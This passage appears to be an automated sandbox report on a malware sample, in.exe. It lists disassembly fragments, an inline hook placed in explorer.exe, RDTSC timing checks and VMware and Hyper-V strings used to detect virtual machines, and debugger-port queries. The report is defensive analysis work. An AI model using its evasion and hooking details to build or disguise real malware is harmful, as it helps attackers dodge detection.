          Source: in.exeStatic PE information: real checksum: 0xe27c should be: 0x40e3b
          Source: C:\Users\user\Desktop\in.exeCode function: 1_2_00B47CC0 push eax; ret
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0041D0D2 push eax; ret
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0041D0DB push eax; ret
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0041D085 push eax; ret
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0041D13C push eax; ret
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_00417BE0 push 28F71FB6h; retf
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_00416561 push ebx; ret
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_004165A6 push ebx; ret
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_00B47CC0 push eax; ret
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016FD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CBD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0044D0D2 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0044D0DB push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0044D085 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_0044D13C push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00447BE0 push 28F71FB6h; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_00446561 push ebx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_004465A6 push ebx; ret

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xE3
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\in.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\in.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000004398E4 second address: 00000000004398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 0000000000439B5E second address: 0000000000439B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_00409A90 rdtsc
          Source: C:\Windows\explorer.exe TID: 4524Thread sleep count: 56 > 30
          Source: C:\Windows\explorer.exe TID: 4524Thread sleep time: -112000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 5336Thread sleep count: 33 > 30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 5336Thread sleep time: -66000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: explorer.exe, 00000004.00000000.272838998.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.272838998.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.275212385.0000000008DBD000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.612129459.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.273493490.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.273493490.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
          Source: explorer.exe, 00000004.00000002.610626366.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.273493490.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000004.00000000.273106949.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
          Source: explorer.exe, 00000004.00000000.273493490.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
          Source: explorer.exe, 00000004.00000000.273106949.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.267766064.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000004.00000002.612129459.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000002.612129459.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000002.612129459.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\in.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\in.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\in.exeCode function: 1_2_00B47790 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 1_2_00EFF471 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 1_2_00EFF2C6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 1_2_00EFF329 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 1_2_00EFF289 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 1_2_00EFEA1A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_00B47790 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016AC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01723540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016C7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01778D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0172A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016C4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016AAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01758DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_017341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_017251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_017251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_017251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_017251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_017269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016DA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016CC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016C746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01771074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01762073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0173C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0173C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016DA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016DBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01774015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01774015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01727016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01727016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01727016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01726C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01726C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01726C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01726C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0177740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0177740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0177740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01726CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01726CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01726CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_017614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01778CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0173B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0173B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0173B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0173B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0173B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0173B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016DF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01723884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01723884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016ADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016BFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01778F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016ADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016BEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01778B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016AF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016DE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0173FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0173FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0176131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0177070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0177070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016CF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_017253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_017253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01775BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01727794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01727794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01727794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0175D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0176138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016DB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016B766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016E927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0175B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0175B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01778A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_01734257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_016A9240 mov eax, dword ptr fs:[00000030h]
